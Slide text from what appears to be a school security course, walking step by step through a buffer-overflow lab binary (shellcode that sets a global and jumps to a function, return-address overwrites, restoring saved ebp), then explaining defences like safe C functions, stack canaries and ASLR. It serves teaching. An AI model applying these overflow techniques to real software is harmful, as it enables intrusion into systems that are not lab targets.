Sendstring Makecookie The best way to familiarize yourself with these programs is to execute them as described in buflab.pdf All these programs are available inside the virtual machine, in the directory obstacle_course 145 An obstacle course exercise First, familiarize yourself with the reading material in buflab.pdf This handout contains detailed instructions on how you should

approach this obstacle-course exercise. Dont rush through this exercise. Approach this exercise over multiple class sessions, if necessary. It is important to have a solid understanding of this material if you wish to compete in online hacking competitions. Once youre in Level 0 (Candle), move to the next slide. We will work through this level (and all levels) together. Solutions to all levels are also available in the virtual machine. However, for the best experience, you should try to solve the

problem on your own without looking at the solutions, and then compare your with with the solutions provided. 146 The Candle level (Level 0) Look at the code in test(). Your objective is to get it to call smoke() when the function returns. Disassemble bufbomb, either within a debugger or using objdump. The code listing is provided for you in the file assembly-bufbomb.txt. So, how do we get test to call smoke when it finishes execution? Remember, getbuf() is a function that has a buffer overflow. Lets look at the code of getbuf() in the disassembly. 147

The Candle level (Level 0) Notice that the stack entry for this function is 0x28h long (%esp is decremented by that amount). Notice also that the value loaded into eax is ebp-0x14h. This line corresponds to the source code of getbuf where the buffer is referenced. This shows that the buffer is 14h=20 bytes below the value of %ebp. What does the stack look like when getbuf is called? 148 The Candle level (Level 0) The stack would look like the picture shown alongside. ebp

return addr Value of ebp The offsets are as follows: esp to ebp: 0x28h (=40 bytes) buf eax to ebp: 0x14h (=20 bytes) eax to the return address = 24 bytes (since the saved return address is 4 bytes long) 149 eax esp The Candle level (Level 0)

So this suggested that if we fill up the buffer buf with 20 bytes of junk, followed by the address of the smoke function, we will have accomplished our objective. ebp buf eax esp 150 return addr Value of ebp

The Candle level (Level 0) You still need to overwrite the return address with the address of smoke. ebp What is it? Look at the assembly code. It is 0804898d. Intel x86 machines follow what is called little-endian notation to store numbers. Exercise: Google Little endian to learn about this notation. 151 return addr Value of ebp

buf eax esp The Candle level (Level 0) A sample solution is provided in candle/exploit.txt ebp As you can see, there are 24 junk bytes (the value 0x30h), followed by the address of smoke in little endian notation. Run this exploit on bufbomb as instructed in the PDF. The program

will invoke smoke! 152 return addr Value of ebp buf eax esp 24 Review of the Candle level (Level 0) So what have we learned so far? That the stack layout is very important to understand That you can use gdb or assembly language listing to understand the stack layout.

That by carefully overwriting the return address, you can cause the program to do unexpected things! Like call smoke()! We are now ready to proceed to the next level, the Sparkler level 153 The Sparkler level (Level 1) This level is almost identical to the Candle level, except with the additional twist that the bufbomb program recognizes your cookie, and fails if you dont enter the cookie properly. In particular, this is exactly the role of the code in the ``fizz function. So we have to enter our cookie correctly. For the username alice, the cookie is 0x41f8b226. Let us work through this example using the stack frame.

154 The Sparkler level (Level 1) Look at the code for fizz: The main difference, as compared to the smoke() function, is that fizz() accepts an integer argument. How are arguments passed to functions? They are passed through the stack! So we need to ensure that the argument is inserted into the stack, above the return address 155 The Sparkler level (Level 1) Our exploit string will pass the argument (the COOKIE) via the

stack. Since the task of overwriting the return address is identical to that in Level 0, we can reuse the same exploit string. COOKIE ebp We only need to append the value of our cookie at the end. buf The sample solution is provided in sparkler/exploit.txt eax

Run it and enjoy! esp 156 return addr Value of ebp 24 The Firecracker level (Level 2) Now that weve completed some simple levels, lets step things up a notch. In both the Candle and Sparkler levels, you got the program to execute code that was already written for you in the bufbomb program (namely, the functions candle and fizz). In this level, you will exploit the bufbomb program, and

get it to execute code of your choosing! (Well, almost) This is how real-world buffer overflow exploits work---with attackers choosing what code they want the exploit to execute. 157 The Firecracker level (Level 2) Let us first examine what this level asks us to do: We have to modify the value of a global variable and set it to the value of our cookie. And then, we have to invoke the bang() function.

One way to approach this level would be to think of replacing the return address of getbuf with that of the bang() function, similar to what we did in Level 0 and Level 1. But that wont change the value of the global variable. So how do we proceed? 158 The Firecracker level (Level 2) Ideally, we want our exploit to execute the following pseudocode: global_variable = 0x41f8b226; invoke bang(); As the manual, buflab.pdf, warns us, we want to stay away from using the x86 call instruction because it uses something called relative addressing.

We need to do the following tasks first: Let us try to locate the address at which global_variable is stored in the programs memory. We will then try to locate where bang is located. And then, we will try to locate at which address the variable buf is loaded in program memory 159 The Firecracker level (Level 2) Our overall attack strategy is going to work as follows. We will fill up the buffer with a string that contains three parts: 1.The part labeled A, starting at the beginning of buf will contain the executable instructions that implement the pseudocode:

global_variable = 0x41f8b226; invoke bang(); 2.The part labeled B is simply a filler. 3.Part C overwrites the return address with the start address of buf. 160 C return addr Value of ebp B buf

A The Firecracker level (Level 2) Examine what happens when getbuf returns: The processor pulls the return address from the stack, which points to the beginning of buf, which contains the code sequence in A. The processor then starts executing the code sequence in A, which contains: C global_variable = 0x41f8b226; invoke bang();

B Once this code is executed by the processor, its Mission accomplished! A 161 return addr Value of ebp buf The Firecracker level (Level 2) But weve to figure out: 1.How to write the pseudocode for global_variable = 0x41f8b226;

invoke bang(); 2.And the starting address of the buffer buf. Well start with the second task first, and use gdb to help us out. In particular, we will leverage gdb breakpoints C A breakpoint in gdb tells gdb to pause the code when some condition is satisfied (e.g., the program starts executing a particular instruction). B At that point, we can inspect the state of the program using gdb. Let us see how.

162 return addr Value of ebp buf A The Firecracker level (Level 2) Load the program in gdb: 163 The Firecracker level (Level 2) Disassemble the getbuf function: We know that the Gets function called within getbuf will take buf as an

argument, so it must have been initialized before the call. Let us set a breakpoint for address 0x0804db0e: 164 The Firecracker level (Level 2) Now run the program within the debugger: From the assembly code of getbuf in the previous slide, we know that the address of buf is loaded in the register %eax, so we can just examine the value of %eax. We want to print the value in hexadecimal, so we use the command p/x $eax, which gives us the address of buf: 0xbfffb7c4 From the assembly dump of bufbomb, we also know that the address of bang() is 0x08048a21, and that the address of global_variable is 0x0804b100. Exercise: Try to obtain the address of bang() and the address of global_variable using gdbs features instead.

165 The Firecracker level (Level 2) We now have all the information to implement the pseudocode for our attack: global_variable = 0x41f8b226; invoke bang(); How do we implement the pseudocode? The first instruction is easy, so lets do it first. We will need to write assembly code to implement it, and will then figure out how to write it out as an input to the bufbomb program. How do you implement global_variable = 0x41f8b226 in assembly code? movl $0x41f8b226, (0x0804b100) This moves the value 0x41f8b226 to the memory at the address 0x0804b100. 166 The Firecracker level (Level 2)

We would now like to invoke bang() without the call instruction. How? We will leverage the fact that the ret instruction looks for a return address on the stack. C Suppose we write the following instructions into region A: B push 0x08048a21; ret return addr Value of ebp

buf 0x08048a21 is the address of bang() And overwrite the return address at C with the address of buf: 0xbfffb7c4 167 A The Firecracker level (Level 2) When getbuf() returns, the processor will start executing the instructions in A, which contains: push 0x08048a21; ret The stack looks like the picture shown here just before the return from getbuf Remember, the stack grows downwards, so the instructions seem

as though they are backwards, but the push is executed before the ret 168 C 0xbfffb7c4 B A ret push 0x08048a21 The Firecracker level (Level 2) When getbuf returns, the instruction push 0x08048a21 executes

The push instruction will insert the value into the stack at the location of %esp esp ret push 0x08048a21 169 The Firecracker level (Level 2) When the push instruction finishes, the stack looks like this. The next instruction to execute will be the ret instruction What does the ret instruction do? It pops the address off at the top of the

stack, and treats it as the return address Thus, the processor will return control to the location 0x08048a21, the starting address of bang(). Done! 170 0x08048a21 esp ret push 0x08048a21 The Firecracker level (Level 2) Thus, putting it all together, the exploit code written in x86 assembly is: movl $0x41f8b226, (0x0804b100) push 0x08048a21

ret How do we write this all up as an exploit string for the sendstring program? We will use the help of gcc! 171 The Firecracker level (Level 2) First, create a file called exploit.s and write the code shown above in it. This is also in exploit.s in the firecracker directory. There are some minor differences but what is important is the movl, push and ret instruction. The order of movl and push can be switched, but ret has to be the last instruction of the 3-instruction sequence movl $0x41f8b226, (0x0804b100) push 0x08048a21 ret

172 The Firecracker level (Level 2) We still need to overwrite the return address with the start address of the buffer, so that when the getbuf function returns, it starts executing the code shown here: movl $0x41f8b226, (0x0804b100) push 0x08048a21 ret How do we do that? Well, we need to somehow write the constant 0xbfffb7c4 (the address of buf) in the space reserved for the return address. 173 The Firecracker level (Level 2) Well, we need to somehow write the constant 0xbfffb7c4

(the address of buf) in the space reserved for the return address. And well need to fill up the bytes between the return address and the ret instruction with some padding bytes. That is exactly what the remaining code in exploit.s does. In x86, nop is represented by 0x90h. nop nop long 0xbfffb7c4 174 The Firecracker level (Level 2) Now compile this file and obtain the executable code: Lets view the disassembly and figure out the hexadecimal encoding of this instruction sequence. 175

The Firecracker level (Level 2) The exploit code in exploit.txt is nothing but the sequence of bytes that represent this sequence. You can just read off the bytes, starting from 68 21 until ff bf. That is your exploit string that you pass to the sendstring program! Done! 176 The Dynamite level (Level 3) The Firecracker level taught you how to insert code of your choosing into the buffer that youre writing into. That is how most real-world exploits work. However, the Firecracker level was still easy in that you just caused the exploit to enter the bang function, which executed, and terminated the execution of the entire program.

Lets up things one notch further, and require that after bang executes, we want the control to return to the invoking function, i.e., test. That is, test should successfully match the value of your cookie, print out the line starting Boom! and the validate(3) must succeed, i.e., the stack must not be corrupted. 177 The Dynamite level (Level 3) return addr Value of ebp Lets work backwards from the validate(3) on line 13. The stack must not be corrupted. That is, we need to ensure that the saved value of %ebp

on the stack is restored correctly after our exploit string has been written 178 buf The Dynamite level (Level 3) return addr Value of ebp Then, the printf() on line 12 should print your cookie. Thus, val should be set to cookie. Where is val set? On line 6, to the return value of getbuf 179

buf The Dynamite level (Level 3) return addr Value of ebp Thus, the exploit must set the return value of getbuf to the value of your cookie. 180 buf The Dynamite level (Level 3) Now that we have worked through the requirements, let is craft the exploit code. Our overall strategy will be

similar to the firecracker level. Once the exploit code starts to execute, where should it return to? In firecracker, we returned to the function bang. In this level, we need to return to the instruction just following the call to getbuf on line 6 of test() This is what we would return to even without a buffer overflow, however, the catch is that val needs to be set to the value of our cookie.

Looking at the assembly code of test, we find that the location we need to return to is 0x8048aa5 181 The Dynamite level (Level 3) How do we set the return value of getbuf? Lets look at the assembly dump of getbuf. The return value is being passed through the register %eax. Thus, if we can set the value of %eax to our cookie, were done. 182

The Dynamite level (Level 3) Putting these two steps together using the same logic we used for the Firecracker level gives us this code sequence: movl $0x41f8b226, %eax push 0x08048aa5 ret When this code executes, it changes the value of %eax to the cookie, pushes the correct return address on the stack, and invokes ret, causing the processor to start executing at 0x08048aa5. We need to overwrite the return address on the stack with the start address of this instruction sequence. 183 The Dynamite level (Level 3) Its the same buffer we used in the Firecracker level, and we figured out its address using gdb for that level.

It was 0xbfffb7c4. We need to overwrite the return address with this value. But are we done? Can we fill up the buffer buf with arbitrary padding bytes, as in the Firecracker level? Lets see what would happen if we did that. 184 The Dynamite level (Level 3) If we fill up the space between the Ret instruction and the return address with nop instructions, we will corrupt the saved %ebp on the stack! The consequence will be that when getbuf returns, the stack frame of test will not be restored correctly, and the validate(3) will

fail, causing our program to crash. So we must also take care to restore the value of %ebp on the stack. 185 0xbfffb7c4 Saved ebp nop nop nop nop nop nop ret movl $0x41f8b226, %eax push 0x08048aa5

The Dynamite level (Level 3) How do we figure out the saved value of %ebp? Lets use gdb! The old value of %ebp is stored at the location pointed to by the current %ebp. Just print it out after setting a breakpoint on getbuf. The value is 0xbfffb808. And so, that value needs to be written up in the exploit. 186 0xbfffb7c4 Saved ebp nop nop nop

nop nop nop ret movl $0x41f8b226, %eax push 0x08048aa5 The Dynamite level (Level 3) How do we figure out the saved value of %ebp? Lets use gdb! The old value of %ebp is stored at the location pointed to by the current %ebp. Just print it out after setting a breakpoint on getbuf. The value is 0xbfffb808. And so, that value needs to be written up in the exploit. The gdb screenshot appears in

the next slide 187 0xbfffb7c4 Saved ebp nop nop nop nop nop nop ret movl $0x41f8b226, %eax push 0x08048aa5 The Dynamite Level (Level 3)

188 The Nitroglycerine level (Level 5) The previous four levels cover most of the conceptual aspects of how buffer overflow exploits work. Real-world exploits, however, can get much more complicated, and some of these issues are beyond the scope of a course targeted towards middleschool and high-school students. Nevertheless, those of you that feel up to the challenge can try your hands at the optional Level 5 (Nitroglycerine) listed in buflab.pdf! HAPPY HACKING! 189 Buffer Overflow Defenses

Defending against buffer overflow attacks There is an absolute ton of work on defending against buffer overflow attacks. To this day, this topic remains a subject of active investigation in the computer security community. For this course, we will study three broad classes of defences that have seen wide-spread adoption. Many contests, like Cyber Patriot, will also require you to understand and deploy similar defences: 1. Using safe programming constructs 2. Leveraging the compiler to protect the program 3. Leveraging the operating system to protect the program 191

Why study multiple defences? Each defence operates under different assumptions and provides different levels of security: Using safe programming constructs is generally the best option. It protects your program by eliminating the source of the problem, i.e., fixing the buffer overflow vulnerability. However, you need to have access to and be willing to modify the source code to deploy this defence. Using the compiler is the next best defence. You still need access to source code to recompile, but do not have to modify the source code. This method does not eliminate the vulnerability, just makes it harder for the attacker to exploit it.

Using the operating system is the third best defence. The benefit is that you dont need access to the programs source code, or even to recompile it. But the cost is that the security that you obtain is much weaker than the above two approaches. 192 1. Safe programming constructs Generally speaking, C and C++ provide a number of unsafe programming constructs. Two of the most popular unsafe constructs are: gets and strcpy These functions are unsafe because they do not check the size of the buffer into which they write data. To eliminate the buffer overflow vulnerability, these need to be replaced with their safe versions, fgets and strncpy. The safe functions check the bounds of the buffer.

193 1. Safe programming constructs Open the file called safe_programming.c in the VM. This file implements four functions, two that use unsafe programming constructs and two that use the corresponding safe constructs. Exercise: Invoke one function at a time and recompile the program. Each time, try to feed a long string (for gets) and observe the behaviour of the program. What happens in each case? Why? 194 1. Safe programming constructs You can learn about safe and unsafe programming

constructs using UNIX man pages. Study the constructs using the following command lines: man gets man fgets man strcpy man strncpy These are not the only constructs in C. Learn about more safe and unsafe programming constructs. 195 1. Safe programming constructs We have seen some safe and unsafe programming constructs in C. Learn about more safe and unsafe programming constructs using UNIX man pages (or with the help of Google). Are the following safe or unsafe? strcat strncat

strlcpy strlcat 196 1. Safe programming constructs Using safe programming constructs is not the only way to eliminate buffer overflow vulnerabilities. There are many more ways in which vulnerabilities happen. The best way to find and fix vulnerabilities is to use the help of programming tools that are widely available today: Compilers often emit warnings about the use of unsafe functions. UNIX tools such as lint, dlint, and commercial tools such as Grammatech CodeSonar, HP Fortify specialize in finding potential buffer overflow sites in the program. These tools help focus programmer attention to find and fix bugs before software is deployed.

197 2. Using the compiler Modern compilers, such as newer versions of gcc, also provide a measure of protection against buffer overflows. They do this by protecting the return address on the stack. Take safe-programming.c and do the following: gcc fno-stack-protector safe-programming.c o unsafe.o gcc safe-programming.c o safe.o Now, disassemble safe.o and unsafe.o using objdump and study the differences (pick one function in each to study the differences). In the safe version, you see calls to __stack_chk_fail. What do you think it does? 198

2. Using the compiler In the safe version, you see calls to __stack_chk_fail. What do you think it does? Obtain a safe version that calls the function gets_user_input and try to feed a long input that would normally cause the program to segfault. You see the following output: Now run the unsafe version with the same input. It segfaults. That is the runtime behaviour of the function __stack_chk_fail. It detects stack smashing attempts, i.e., attempts to overwrite the return address 199 2. Using the compiler How does __stack_chk_fail Implement this functionality? The answer is that the compiler saves the return address

of the function that is invoked to another location in memory, and __stack_chk_fail first checks that the return address on the stack matches what has been saved. If not, it throws an exception, like you just saw, thus prevent an exploit from succeeding! 200 2. Using the compiler Modern compilers (e.g., most modern versions of gcc) implement stack return address protection by default. You have to explicitly disable it if you dont want it. Why would one choose to disable something good like stack protection? Compile the program safe_programming/lots_of_calls.c with gcc stack protection and without stack protection. Run both programs and time them. What do you see?

201 2. Using the compiler There is a performance cost for stack protection Although this is a simple example, in real-world programs, even small performance differences matter. Thus, sometimes developers choose to turn off stack protection. 202 3. Operating system based defenses There are a number of ways in which operating systems can be used to harden programs against attack. We will look at one of them, called address-space layout randomization, or ASLR Let us first study ASLR in practice. Your virtual machine has ASLR disabled, and we will study the effect of ASLR

by observing the behaviour of a program with and without it. 203 3. Operating system based defenses First, let us confirm that ASLR is disabled in your VM. Do cat /proc/sys/kernel/randomize_va_space This file should contain a single entry, 0, if ASLR is disabled Now open file aslr/aslr.c and study its contents. It prints out the address of a buffer that is allocated locally within the main function. Compile and run this program multiple times and observe its output. What do you see? You should see that buf is allocated at the same address always. 204

3. Operating system based defenses Now let us enable ASLR in your VM. The directions to do so are in the file called ASLR_README.txt in the aslr directory. Ensure that you reboot the VM (type reboot on the command line). Do cat /proc/sys/kernel/randomize_va_space This file should contain a single entry, 2, if ASLR is enabled As before, compile and run aslr.c multiple times and observe its output. If you have the compiled code from the previous slide, there is no need to even recompile. What do you see? You should see that buf is allocated at the same address always. 205 3. Operating system based defenses Now what do you see? You should see that buf is allocated at

different addresses each time! Whats going on and why? Let us study this in detail. 206 3. Operating system based defenses The operating system is randomizing the address-space layout of the program. In this case, it is adding a random amount of padding to the base of the stack (see picture). Each time you run the program, the amount of padding added to the stack base is different. As a result, the precise address of buf is different for each run

of the program. 207 Random amount Of padding buf 3. Operating system based defenses Why does adding padding make it difficult to write an exploit? Recall Level-2 (Firecracker) of the obstacle course exercise. One of your tasks was to overwrite the return address with the address of buf. If you, the attacker, have to do this, youre going to have a hard time

guessing the address of buf! 208 Random amount Of padding Addr of buf buf 3. Operating system based defenses Do the following exercise: For each of the 5 levels of the obstacle course, run your exploit strings again in your VM with ASLR enabled. For which levels do the same exploit strings work? For which levels do the exploit strings no longer work? Explain why ASLR defeats the exploits for those levels?

Once you complete this exercise, disable ASLR using the instructions in ASLR_README.txt and reboot. You will need to disable ASLR in case you wish to revisit any of the other exercises in this course, since they have been designed to work with ASLR disabled. 209

Recently Viewed Presentations

  • mscasselmansclass.weebly.com

    mscasselmansclass.weebly.com

    The Highwayman- Alfred Noyes. Make notes on the plot, setting, theme, and characterization in each story. How to Study for Part C; Review the types of questions you were asked about each of the stories we studied. We focused on...
  • What to Say Effective Get-Out-the-Vote Conversations Elizabeth A.

    What to Say Effective Get-Out-the-Vote Conversations Elizabeth A.

    I remember my first time voting. I had just turned 18 and was… I usually vote on my lunch hour at a polling place close to where I work because that's what's convenient for me. What will work for you?...
  • The 2017 U.S. Open Championship A first for Wisconsin

    The 2017 U.S. Open Championship A first for Wisconsin

    442,403 - Number of pieces of U.S. Open Logoed merchandise sold. 840 - Number of credentialed media. 250+ - Number of individual tents in all sizes. 350,000+ - Amount in square feet of tented space. ... The 2017 U.S. Open...
  • INTELLIGENT BUILDINGS AND THE IMPACT OF THE INTERNET

    INTELLIGENT BUILDINGS AND THE IMPACT OF THE INTERNET

    The score was combined for all responses across all building system types. The total was then re-based so that the system type that had the lowest score was set to zero and the system type with the highest score set...
  • Characteristics of Living Things

    Characteristics of Living Things

    There are 6 characteristics that all living things share! Discuss with your elbow partner what you think some of the characteristics are.
  • Information Technology Careers

    Information Technology Careers

    Skills - talent to do a task - training or experience. Abilities - a skill you have already developed. Aptitude - the potential a person has for learning a skill. Discovering Interests, Skills, Abilities, and Aptitudes. is . the 1....
  • Technology For Us, Too?

    Technology For Us, Too?

    Technology For Us, Too? Students with Visual and Severe Multiple Disabilities . Nathalie de Wit, MS. Lead Teacher. Perkins School for the Blind, Lower School
  • Microsoft Word - Miller Place High School

    Microsoft Word - Miller Place High School

    The thesaurus finds synonyms for a selected word, words that mean the same. Also displays antonyms—words that mean the opposite. ... Select the text you wish to copy, click the format painter icon twice. Clicking once, only allows you to...